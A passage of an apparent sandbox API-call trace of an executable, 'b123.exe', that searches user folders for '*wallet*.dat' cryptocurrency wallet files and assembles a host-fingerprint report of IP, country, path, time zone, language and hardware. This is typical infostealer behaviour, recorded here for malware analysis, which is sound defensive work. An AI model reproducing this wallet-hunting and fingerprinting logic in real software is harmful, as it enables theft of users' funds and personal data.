ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3d467, cFileName="User", cAlternateFileName="")) returned 1 [0234.840] PathMatchSpecA (pszFile="User", pszSpec="*wallet*.dat") returned 0 [0234.840] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*", lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x141f, cFileName=".", cAlternateFileName="")) returned 0x6e1aa0 [0234.843] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x141f, cFileName="..", cAlternateFileName="")) returned 1 [0234.843] PathMatchSpecA (pszFile="Document Themes", pszSpec="*wallet*.dat") returned 0 [0234.850] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0234.850] PathMatchSpecA (pszFile="SmartArt Graphics", pszSpec="*wallet*.dat") returned 0 [0234.851] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0234.851] PathMatchSpecA (pszFile="Word Document Bibliography Styles", pszSpec="*wallet*.dat") returned 0 [0234.852] PathMatchSpecA (pszFile="Word Document Building Blocks", pszSpec="*wallet*.dat") returned 0 [0234.852] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0234.852] PathMatchSpecA (pszFile="Normal.dotm", pszSpec="*wallet*.dat") returned 0 [0234.853] PathMatchSpecA (pszFile="Vault", pszSpec="*wallet*.dat") returned 0 [0234.853] PathMatchSpecA (pszFile="Windows", pszSpec="*wallet*.dat") returned 0 [0234.853] PathMatchSpecA (pszFile="AccountPictures", pszSpec="*wallet*.dat") returned 0 [0234.854] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0234.854] PathMatchSpecA (pszFile="Libraries", pszSpec="*wallet*.dat") returned 0 [0234.916] PathMatchSpecA (pszFile="CameraRoll.library-ms", pszSpec="*wallet*.dat") returned 0 [0234.916] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0234.916] PathMatchSpecA (pszFile="Documents.library-ms", pszSpec="*wallet*.dat") returned 0 [0234.916] PathMatchSpecA (pszFile="Music.library-ms", pszSpec="*wallet*.dat") returned 0 [0234.916] PathMatchSpecA (pszFile="Pictures.library-ms", pszSpec="*wallet*.dat") returned 0 [0234.916] PathMatchSpecA (pszFile="SavedPictures.library-ms", pszSpec="*wallet*.dat") returned 0 [0234.917] PathMatchSpecA (pszFile="Videos.library-ms", pszSpec="*wallet*.dat") returned 0 [0234.918] PathMatchSpecA (pszFile="Network Shortcuts", pszSpec="*wallet*.dat") returned 0 [0234.918] PathMatchSpecA (pszFile="Printer Shortcuts", pszSpec="*wallet*.dat") returned 0 [0234.918] PathMatchSpecA (pszFile="Recent", pszSpec="*wallet*.dat") returned 0 [0234.918] PathMatchSpecA (pszFile="-HwWSNm92uv5.lnk", pszSpec="*wallet*.dat") returned 0 [0234.919] PathMatchSpecA (pszFile="-MKAOQykfLiRmr dMoM.lnk", pszSpec="*wallet*.dat") returned 0 [0234.919] PathMatchSpecA (pszFile="-SnaEW4V9Fgd.lnk", pszSpec="*wallet*.dat") returned 0 [0234.919] PathMatchSpecA (pszFile="0JqBsk.lnk", pszSpec="*wallet*.dat") returned 0 [0234.919] PathMatchSpecA (pszFile="0poI_x.lnk", pszSpec="*wallet*.dat") returned 0 [0234.919] PathMatchSpecA (pszFile="0QfIs_.lnk", pszSpec="*wallet*.dat") returned 0 [0234.919] PathMatchSpecA (pszFile="0Sn0FAGOtg2LKtz.lnk", pszSpec="*wallet*.dat") returned 0 [0234.919] PathMatchSpecA (pszFile="0zeSNmCv7BPopUVpktt_.lnk", pszSpec="*wallet*.dat") returned 0 [0234.919] PathMatchSpecA (pszFile="1mdU6cFSp65FC.lnk", pszSpec="*wallet*.dat") returned 0 [0234.920] PathMatchSpecA (pszFile="1uIWo C.lnk", pszSpec="*wallet*.dat") returned 0 [0234.920] PathMatchSpecA (pszFile="1y2D.lnk", pszSpec="*wallet*.dat") returned 0 [0234.920] PathMatchSpecA (pszFile="23CiQ.lnk", pszSpec="*wallet*.dat") returned 0 [0234.920] PathMatchSpecA (pszFile="3i4CI1E0vkStL (2).lnk", pszSpec="*wallet*.dat") returned 0 [0234.920] PathMatchSpecA (pszFile="3i4CI1E0vkStL.lnk", pszSpec="*wallet*.dat") returned 0 [0234.920] PathMatchSpecA (pszFile="41P8Tg7BGG5tULcv.lnk", pszSpec="*wallet*.dat") returned 0 [0234.920] PathMatchSpecA (pszFile="4oOVbKfDfko57-e5v.lnk", pszSpec="*wallet*.dat") returned 0 [0234.920] PathMatchSpecA (pszFile="4z5DEnVqMkOuw.lnk", pszSpec="*wallet*.dat") returned 0 [0234.920] PathMatchSpecA (pszFile="6jNU2fkYVYb5VmYz8.lnk", pszSpec="*wallet*.dat") returned 0 [0234.920] PathMatchSpecA (pszFile="6Z7kDwN.lnk", pszSpec="*wallet*.dat") returned 0 [0234.920] PathMatchSpecA (pszFile="7Di9dW_BhxfMaOBZAifk.flv.lnk", pszSpec="*wallet*.dat") returned 0 [0234.921] PathMatchSpecA (pszFile="7huL8.lnk", pszSpec="*wallet*.dat") returned 0 [0234.921] PathMatchSpecA (pszFile="7N-q1e8GW_vON3.lnk", pszSpec="*wallet*.dat") returned 0 [0234.921] PathMatchSpecA (pszFile="86Jlv2MiTFm4 sUr7N.lnk", pszSpec="*wallet*.dat") returned 0 [0234.921] PathMatchSpecA (pszFile="8b8CIA.lnk", pszSpec="*wallet*.dat") returned 0 [0234.921] PathMatchSpecA (pszFile="8Vd4a.lnk", pszSpec="*wallet*.dat") returned 0 [0234.921] PathMatchSpecA (pszFile="9E7nwAigdhTCm_lGyCSU.lnk", pszSpec="*wallet*.dat") returned 0 [0234.921] PathMatchSpecA (pszFile="9IaTesC90JdOZWp3cz6L.lnk", pszSpec="*wallet*.dat") returned 0 [0234.921] PathMatchSpecA (pszFile="9meKt.lnk", pszSpec="*wallet*.dat") returned 0 [0234.922] PathMatchSpecA (pszFile="9NpAm K3zrC6XUu.lnk", pszSpec="*wallet*.dat") returned 0 [0234.922] PathMatchSpecA (pszFile="9SdM.lnk", pszSpec="*wallet*.dat") returned 0 [0234.922] PathMatchSpecA (pszFile="a3nD8d4sJ5LORnkZhU.lnk", pszSpec="*wallet*.dat") returned 0 [0234.922] PathMatchSpecA (pszFile="A5UiJiRlhd5XMqDR8RXU.lnk", pszSpec="*wallet*.dat") returned 0 [0234.922] PathMatchSpecA (pszFile="AutomaticDestinations", pszSpec="*wallet*.dat") returned 0 [0234.922] PathMatchSpecA (pszFile="5f7b5f1e01b83767.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0234.922] PathMatchSpecA (pszFile="7e4dca80246863e3.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0234.923] PathMatchSpecA (pszFile="9d1f905ce5044aee.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0234.923] PathMatchSpecA (pszFile="f01b4d95cf55d32a.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0234.923] PathMatchSpecA (pszFile="B-KhDnQSz.lnk", pszSpec="*wallet*.dat") returned 0 [0234.923] PathMatchSpecA (pszFile="B8F1yjv.lnk", pszSpec="*wallet*.dat") returned 0 [0234.923] PathMatchSpecA (pszFile="bazk.lnk", pszSpec="*wallet*.dat") returned 0 [0234.923] PathMatchSpecA (pszFile="BbPOIJDlGX6.lnk", pszSpec="*wallet*.dat") returned 0 [0234.923] PathMatchSpecA (pszFile="BoIGi1aH3aw.lnk", pszSpec="*wallet*.dat") returned 0 [0234.923] PathMatchSpecA (pszFile="bWSpsM0Ph.lnk", pszSpec="*wallet*.dat") returned 0 [0234.924] PathMatchSpecA (pszFile="Cb7A_NbZOpMRIz5Mo.lnk", pszSpec="*wallet*.dat") returned 0 [0234.924] PathMatchSpecA (pszFile="Common Files.lnk", pszSpec="*wallet*.dat") returned 0 [0234.924] PathMatchSpecA (pszFile="CTZllqwm0R.lnk", pszSpec="*wallet*.dat") returned 0 [0234.924] PathMatchSpecA (pszFile="cugFlwl0MDO0a-on.lnk", pszSpec="*wallet*.dat") returned 0 [0234.924] PathMatchSpecA (pszFile="CustomDestinations", pszSpec="*wallet*.dat") returned 0 [0234.925] PathMatchSpecA (pszFile="6d2bac8f1edf6668.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0234.925] PathMatchSpecA (pszFile="7e4dca80246863e3.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0234.925] PathMatchSpecA (pszFile="9d1f905ce5044aee.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0234.925] PathMatchSpecA (pszFile="f01b4d95cf55d32a.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0234.927] PathMatchSpecA (pszFile="DaHMamfV57Ik.lnk", pszSpec="*wallet*.dat") returned 0 [0234.927] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0234.927] PathMatchSpecA (pszFile="djD4QS.lnk", pszSpec="*wallet*.dat") returned 0 [0234.927] PathMatchSpecA (pszFile="eFwC NcGjDH.lnk", pszSpec="*wallet*.dat") returned 0 [0234.927] PathMatchSpecA (pszFile="ER6tblarqvepAm.lnk", pszSpec="*wallet*.dat") returned 0 [0234.927] PathMatchSpecA (pszFile="FkMu14sHAwu_AkH6JV.lnk", pszSpec="*wallet*.dat") returned 0 [0234.927] PathMatchSpecA (pszFile="FX599e59d6dLeG1.lnk", pszSpec="*wallet*.dat") returned 0 [0234.928] PathMatchSpecA (pszFile="G9t-zlHgOtPZ.lnk", pszSpec="*wallet*.dat") returned 0 [0234.928] PathMatchSpecA (pszFile="GbqMkqm.lnk", pszSpec="*wallet*.dat") returned 0 [0234.928] PathMatchSpecA (pszFile="GeDLw.lnk", pszSpec="*wallet*.dat") returned 0 [0234.928] PathMatchSpecA (pszFile="HBLvMvn0KqweD.lnk", pszSpec="*wallet*.dat") returned 0 [0234.928] PathMatchSpecA (pszFile="hl3H1ouU7tt.lnk", pszSpec="*wallet*.dat") returned 0 [0234.928] PathMatchSpecA (pszFile="Hn7Aqb1.lnk", pszSpec="*wallet*.dat") returned 0 [0234.928] PathMatchSpecA (pszFile="Hq8vZrXOMPeqV6Ts1.lnk", pszSpec="*wallet*.dat") returned 0 [0234.929] PathMatchSpecA (pszFile="h_eZc13DnFoapRJF op.lnk", pszSpec="*wallet*.dat") returned 0 [0234.929] PathMatchSpecA (pszFile="IBwW25IlRUYNR.lnk", pszSpec="*wallet*.dat") returned 0 [0234.929] PathMatchSpecA (pszFile="iqoBrXk6axwDq5CokOO6.lnk", pszSpec="*wallet*.dat") returned 0 [0234.929] PathMatchSpecA (pszFile="IyVYosdpAWUK-P2C.lnk", pszSpec="*wallet*.dat") returned 0 [0234.930] PathMatchSpecA (pszFile="J HN7_Jk9Ro3d.lnk", pszSpec="*wallet*.dat") returned 0 [0234.948] GetProcessHeap () returned 0x6b0000 [0234.948] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xf423f) returned 0xf097020 [0234.953] lstrcatA (in: lpString1="", lpString2="Tag: " | out: lpString1="Tag: ") returned="Tag: " [0234.953] lstrcatA (in: lpString1="Tag: ", lpString2="Default" | out: lpString1="Tag: Default") returned="Tag: Default" [0234.953] lstrcatA (in: lpString1="Tag: Default", lpString2="\n\n" | out: lpString1="Tag: Default\n\n") returned="Tag: Default\n\n" [0234.953] lstrcatA (in: lpString1="Tag: Default\n\n", lpString2="IP: IP?" | out: lpString1="Tag: Default\n\nIP: IP?") returned="Tag: Default\n\nIP: IP?" [0234.953] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\n") returned="Tag: Default\n\nIP: IP?\n" [0234.953] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\n", lpString2="Country: Country?" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?") returned="Tag: Default\n\nIP: IP?\nCountry: Country?" [0234.953] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\n" [0234.953] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\n", lpString2="Working Path: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: " [0234.953] GetCurrentProcessId () returned 0x7fc [0234.954] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7fc) returned 0x288 [0234.954] GetModuleFileNameExA (in: hProcess=0x288, hModule=0x0, lpFilename=0x1986b4, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\b123.exe")) returned 0x26 [0234.955] CloseHandle (hObject=0x288) returned 1 [0234.955] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: ", lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe" [0234.955] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\n" [0234.955] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\n", lpString2="Local Time: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: " [0234.955] GetProcessHeap () returned 0x6b0000 [0234.955] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x104) returned 0x6ff988 [0234.955] GetLocalTime (in: lpSystemTime=0x1987b8 | out: lpSystemTime=0x1987b8*(wYear=0x7e6, wMonth=0x3, wDayOfWeek=0x3, wDay=0x17, wHour=0x4, wMinute=0x30, wSecond=0x23, wMilliseconds=0x380)) [0234.955] wsprintfA (in: param_1=0x6ff988, param_2="%d/%d/%d %d:%d:%d" | out: param_1="23/3/2022 4:48:41") returned 17 [0234.956] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: ", lpString2="23/3/2022 4:48:41" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41" [0234.956] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\n" [0234.956] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\n", lpString2="TimeZone: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: " [0234.956] GetProcessHeap () returned 0x6b0000 [0234.956] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x104) returned 0x6e6680 [0234.956] GetTimeZoneInformation (in: lpTimeZoneInformation=0x198718 | out: lpTimeZoneInformation=0x198718) returned 0x1 [0234.956] wsprintfA (in: param_1=0x6e6680, param_2="UTC%d" | out: param_1="UTC1") returned 4 [0234.956] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: ", lpString2="UTC1" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1" [0234.956] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\n" [0234.956] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\n", lpString2="Display Language: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: " [0234.956] GetUserDefaultLocaleName (in: lpLocaleName=0x198710, cchLocaleName=85 | out: lpLocaleName="en-US") returned 6 [0234.957] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6dff00 [0234.974] CharToOemW (in: pSrc="en-US", pDst=0x6dff00 | out: pDst="en-US") returned 1 [0234.974] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: ", lpString2="en-US" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US" [0234.974] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\n" [0234.974] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\n", lpString2="Keyboard Languages: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: " [0234.974] GetProcessHeap () returned 0x6b0000 [0234.974] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1f4) returned 0x6e93b0 [0234.974] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0234.975] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x6dff50 [0234.975] GetKeyboardLayoutList (in: nBuff=1, lpList=0x6dff50 | out: lpList=0x6dff50) returned 1 [0234.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x2, lpLCData=0x1985c0, cchData=512 | out: lpLCData="English (United States)") returned 24 [0235.087] wsprintfA (in: param_1=0x6e93b0, param_2="%s" | out: param_1="English (United States)") returned 23 [0235.087] LocalFree (hMem=0x6dff50) returned 0x0 [0235.087] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: ", lpString2="English (United States)" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)" [0235.087] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\n" [0235.087] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\n", lpString2="Is Laptop: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: " [0235.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x1987bc | out: lpSystemPowerStatus=0x1987bc) returned 1 [0235.087] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: ", lpString2="No" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No" [0235.087] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\n" [0235.087] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\n", lpString2="Processor: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: ") returned="Tag: 